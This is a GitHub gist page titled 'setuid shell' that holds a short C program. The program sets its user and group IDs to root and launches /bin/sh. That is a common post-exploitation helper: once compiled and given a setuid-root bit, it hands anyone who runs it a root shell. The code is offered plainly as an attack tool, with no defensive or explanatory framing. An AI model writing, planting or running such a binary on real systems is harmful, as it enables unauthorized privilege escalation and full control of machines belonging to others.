Skip to content

Instantly share code, notes, and snippets.

@c4mx
Created May 12, 2020 15:19
Show Gist options
  • Save c4mx/67f9ae33af5eebf33a29cf4c539c120f to your computer and use it in GitHub Desktop.
Save c4mx/67f9ae33af5eebf33a29cf4c539c120f to your computer and use it in GitHub Desktop.
setuid shell
#include <stdlib.h>
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
system("/bin/sh");
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment